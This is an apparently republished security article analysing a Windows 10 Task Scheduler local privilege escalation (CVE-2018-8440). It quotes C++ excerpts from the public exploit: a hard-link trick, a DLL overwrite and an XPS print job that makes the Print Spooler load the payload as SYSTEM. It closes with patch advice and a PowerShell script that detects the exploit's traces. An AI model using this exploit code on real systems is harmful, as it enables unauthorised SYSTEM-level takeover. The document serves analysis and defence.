Case Analysis of a Windows 10 Local Privilege Escalation 0day Early Warning

2025-03-02 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/01 Report

This article walks through a local privilege escalation 0day in Windows 10: the vulnerable Task Scheduler RPC function, the hard-link trick the published exploit uses to turn a DACL write into a DLL overwrite, how the payload is loaded into the Print Spooler, and what defenders can do about it.

0x00 Vulnerability background

A function exposed over RPC by the Windows 10 Task Scheduler service does not check the permissions of its caller. A user at any privilege level can call it to obtain write access to sensitive system files and from there escalate to SYSTEM.

0x01 Vulnerability impact

The vulnerability affects Windows 10 and Windows Server 2016. The exploit (EXP) released so far works only on x64 systems.

0x02 Vulnerability details

The Task Scheduler service in Windows 10 exposes the SchRpcSetSecurity function on its RPC interface, which is reached over ALPC. The function sets a security descriptor (given as an SDDL string) on a task or task folder:

HRESULT SchRpcSetSecurity(
    [in, string] const wchar_t* path,
    [in, string] const wchar_t* sddl,
    [in] DWORD flags
);

The service runs inside an svchost.exe process as part of the netsvcs service group; its implementation lives in schedsvc.dll.

On Windows XP, tasks were stored as .job files in C:\Windows\Tasks. On Windows 7 and later, tasks are stored as XML files in C:\Windows\System32\Tasks.

Presumably for backward compatibility, SchRpcSetSecurity on Windows 10 still checks whether a file named <task>.job exists in C:\Windows\Tasks and, if it does, writes the new DACL to that file. The write is performed by the service itself, not on behalf of the caller, which is why it succeeds on files the caller could not modify. If the .job file is a hard link to a DLL of the attacker's choosing, the DACL lands on that DLL instead. An ordinary user normally has only read access to such a DLL; after the call the user holds write access, can overwrite the DLL with exploit code, and then starts a privileged program that loads it to inherit its privileges.

First, the exploit needs a DLL that an ordinary user can read and on which SYSTEM holds the WRITE_DAC right. The released EXP uses C:\Windows\System32\DriverStore\FileRepository\prnms003.inf_amd64_4592475aca2acf83\Amd64\printconfig.dll (the hash suffix in the folder name differs between installations, so the code locates the folder with a wildcard search) and then hard-links C:\Windows\Tasks\UpdateTask.job to it.

// Headers the excerpts on this page depend on (resource.h defines IDR_RCDATA1).
#include <windows.h>
#include <xpsobjectmodel.h>
#include <xpsprint.h>
#include "resource.h"

WIN32_FIND_DATA FindFileData;
HANDLE hFind;
// The DriverStore folder name carries a per-machine hash, so locate it with a wildcard.
hFind = FindFirstFile(L"C:\\Windows\\System32\\DriverStore\\FileRepository\\prnms003.inf_amd64*", &FindFileData);
if (hFind == INVALID_HANDLE_VALUE)
    return 1; // no matching printer driver folder: the exploit cannot continue
wchar_t BeginPath[MAX_PATH] = L"c:\\windows\\system32\\DriverStore\\FileRepository\\";
wchar_t PrinterDriverFolder[MAX_PATH];
wchar_t EndPath[23] = L"\\Amd64\\PrintConfig.dll";
// Copy the folder name including its terminating NUL.
wcscpy_s(PrinterDriverFolder, MAX_PATH, FindFileData.cFileName);
FindClose(hFind);
wcscat_s(BeginPath, MAX_PATH, PrinterDriverFolder);
wcscat_s(BeginPath, MAX_PATH, EndPath);
// Create a hard link from UpdateTask.job to our target: this is the file whose DACL the task scheduler will write.
// CreateNativeHardlink is a helper shipped with the exploit (not shown on this page).
CreateNativeHardlink(L"c:\\windows\\tasks\\UpdateTask.job", BeginPath);

The exploit then calls SchRpcSetSecurity with the task name UpdateTask and an SDDL string that grants the current user write access. The service writes that DACL onto the hard-linked DLL, so the ordinary user now has write permission on it. The next step overwrites the DLL with the exploit.dll payload embedded in the program's resources:

// Must be the name of the final DLL. There may be better ways to grab the handle.
HMODULE mod = GetModuleHandle(L"ALPC-TaskSched-LPE");
// The payload is included as a resource; modify this resource accordingly.
HRSRC myResource = ::FindResource(mod, MAKEINTRESOURCE(IDR_RCDATA1), RT_RCDATA);
unsigned int myResourceSize = ::SizeofResource(mod, myResource);
HGLOBAL myResourceData = ::LoadResource(mod, myResource);
void* pMyBinaryData = ::LockResource(myResourceData);
// Try to open the DLL in a loop: it could already be loaded somewhere, in which case
// CreateFile fails with a sharing violation and we wait before retrying.
HANDLE hFile;
DWORD dwBytesWritten = 0;
do {
    hFile = CreateFile(BeginPath, GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE) {
        Sleep(5000);
    }
} while (hFile == INVALID_HANDLE_VALUE);
// Write the payload only once the open has succeeded.
WriteFile(hFile, (char*)pMyBinaryData, myResourceSize, &dwBytesWritten, NULL);
CloseHandle(hFile);

PrintConfig.dll belongs to the print subsystem and is not loaded by the Print Spooler service by default. The exploit therefore calls StartXpsPrintJob to start an XPS print job, which makes spoolsv.exe load the DLL:

// After writing PrintConfig.dll we start an XpsPrintJob to load the DLL into the print spooler service.
CoInitialize(nullptr);
IXpsOMObjectFactory* xpsFactory = NULL;
CoCreateInstance(__uuidof(XpsOMObjectFactory), NULL, CLSCTX_INPROC_SERVER,
                 __uuidof(IXpsOMObjectFactory), reinterpret_cast<LPVOID*>(&xpsFactory));
HANDLE completionEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
IXpsPrintJob* job = NULL;
IXpsPrintJobStream* jobStream = NULL;
StartXpsPrintJob(L"Microsoft XPS Document Writer", L"PrintJob 1", NULL, NULL,
                 completionEvent, NULL, 0, &job, &jobStream, NULL);
// The job is never given any content; submitting it is enough for spoolsv.exe to load PrintConfig.dll.
jobStream->Close();
CoUninitialize();
return 0;

The whole exploit is compiled as a DLL and injected into notepad.exe to run. When the payload executes inside spoolsv.exe it spawns a notepad.exe, and that process runs with SYSTEM privileges; printconfig.dll on disk has also been replaced by the exploit.dll from the resource.

0x03 Defense measures

Users are advised to install endpoint protection software such as 360 Security Guard to block attacks that exploit this kind of vulnerability, and not to run programs from unknown sources. Microsoft later fixed this issue as CVE-2018-8440 in the September 2018 security updates; applying that update, or any later cumulative update, removes the vulnerability.
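As an added defensive check (not part of the original article or of the published exploit), the following PowerShell script looks for the two artifacts the technique described above leaves behind: a .job file in C:\Windows\Tasks that is a hard link to a file outside that directory, and a PrintConfig.dll under DriverStore whose DACL grants write access to broad principals. It assumes an elevated PowerShell session on Windows 10 with fsutil available; the function name and the list of principals treated as "broad" are assumptions of this example, not something the article specifies.

```powershell
# Added example: hunt for the hard-link and DACL artifacts of the SchRpcSetSecurity technique.
# Not part of the original article or exploit. Assumes an elevated session on Windows 10.
function Find-TaskSchedLpeArtifacts {
    $findings = @()

    # 1. Hard-linked .job files. fsutil prints every NTFS link name of the file, one per line,
    #    without the drive letter. A legitimate .job has exactly one link, inside \Windows\Tasks.
    $tasksDir = 'C:\Windows\Tasks'
    Get-ChildItem -Path $tasksDir -Filter '*.job' -File -ErrorAction SilentlyContinue | ForEach-Object {
        $links   = & fsutil hardlink list $_.FullName 2>$null
        $foreign = $links | Where-Object { $_ -and ($_ -notlike '\Windows\Tasks\*') }
        if ($foreign) {
            $findings += [pscustomobject]@{
                Check  = 'HardlinkedJob'
                Path   = $_.FullName
                Detail = ($foreign -join '; ')
            }
        }
    }

    # 2. Writable PrintConfig.dll. The principals below are an assumption of this example:
    #    the groups an exploit would grant access to, not an exhaustive list.
    $broad = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
    $store = 'C:\Windows\System32\DriverStore\FileRepository'
    Get-ChildItem -Path $store -Recurse -Filter 'PrintConfig.dll' -File -ErrorAction SilentlyContinue | ForEach-Object {
        $acl = Get-Acl -Path $_.FullName
        foreach ($ace in $acl.Access) {
            $rights = $ace.FileSystemRights.ToString()
            if ($ace.AccessControlType -eq 'Allow' -and
                ($broad -contains $ace.IdentityReference.Value) -and
                ($rights -match 'FullControl|Modify|Write')) {
                $findings += [pscustomobject]@{
                    Check  = 'WritablePrintConfig'
                    Path   = $_.FullName
                    Detail = "$($ace.IdentityReference.Value) : $rights"
                }
            }
        }
    }

    return $findings
}

$results = Find-TaskSchedLpeArtifacts
if (-not $results) {
    Write-Output 'No hard-linked .job files or writable PrintConfig.dll found.'
} else {
    $results | Format-Table -AutoSize
}
```

A hit on the first check is strong evidence on its own, since a .job file never legitimately has a second link name. The second check reflects a DACL the exploit leaves behind even after the .job link is deleted; on a patched and untouched system both checks should come back empty.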

That concludes this analysis of the Windows 10 local privilege escalation 0day early warning.
